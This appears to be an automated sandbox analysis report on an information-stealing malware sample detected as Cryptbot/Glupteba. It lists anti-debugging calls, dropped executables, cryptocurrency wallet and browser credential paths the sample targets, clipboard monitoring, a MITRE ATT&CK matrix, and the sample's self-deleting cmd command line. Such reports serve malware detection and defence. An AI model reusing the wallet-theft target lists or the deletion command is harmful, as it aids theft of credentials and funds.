              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0041A280 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,ExpandEnvironmentStringsW,Sleep,GetFileAttributesW,GetFileAttributesW,Sleep,ExpandEnvironmentStringsW,GetFileAttributesW,Sleep,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,Sleep,ExitProcess,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeThread delayed: delay time: 102511
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004AF241 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040E0E2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004106D5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5E332 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F60925 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F50D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A00D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A10925 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0E332 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040E0E2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004106D5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D0D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059E0925 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DE332 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0041178C GetProcessHeap,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A33C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5A58C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040A33C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0A58C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040A33C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DA58C SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DD58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DA888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DA3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040285A AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
              Source: vpn.exe, 00000012.00000003.387443345.0000000003C68000.00000004.00000001.sdmp, Notti.eps.18.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040A45B cpuid
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_AllCookies_list.txt VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Cookies\google_chrome_new.txt VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Information.txt VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Screen_Desktop.jpeg VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies\google_chrome_new.txt VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies.txt VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\screenshot.jpg VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeQueries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\system_info.txt VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A0BF0 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00418C20 CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,ExpandEnvironmentStringsW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,RegOpenKeyExW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004B465F _free,_free,_free,GetTimeZoneInformation,_free,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

              Stealing of Sensitive Information:

              barindex
              Yara detected CryptbotShow sources
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
              Yara detected GluptebaShow sources
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
              Found many strings related to Crypto-Wallets (likely being stolen)Show sources
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeString found in binary or memory: \_Files\_Wallet\Electrum
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeString found in binary or memory: \_Files\_Wallet\ElectronCash
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpString found in binary or memory: *.*%USERPROFILE%\Desktop\*.txt%USERPROFILE%wallet.datUTC--2*%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeString found in binary or memory: %USERPROFILE%\AppData\Roaming\Jaxx
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpString found in binary or memory: *.*%USERPROFILE%\Desktop\*.txt%USERPROFILE%wallet.datUTC--2*%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeString found in binary or memory: %USERPROFILE%\AppData\Roaming\Exodus
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara matchFile source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected CryptbotShow sources
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
              Yara detected GluptebaShow sources
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004098C0 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004095A8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004097BA AddClipboardFormatListener,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F59B10 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F59A0A AddClipboardFormatListener,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F597F8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F59686 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004098C0 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004095A8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004097BA AddClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A097F8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A09686 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A09B10 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A09A0A AddClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004098C0 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004095A8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004097BA AddClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D97F8 RemoveClipboardFormatListener,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D9686 IsWindow,RemoveClipboardFormatListener,IsWindow,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D9B10 AddClipboardFormatListener,SetEvent,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D9A0A AddClipboardFormatListener,

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Startup Items1Startup Items1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder2Process Injection12Obfuscated Files or Information3Input Capture121Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder2Software Packing22Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery55Distributed Component Object ModelInput Capture121Scheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion31LSA SecretsQuery Registry1SSHClipboard Data2Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection12Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
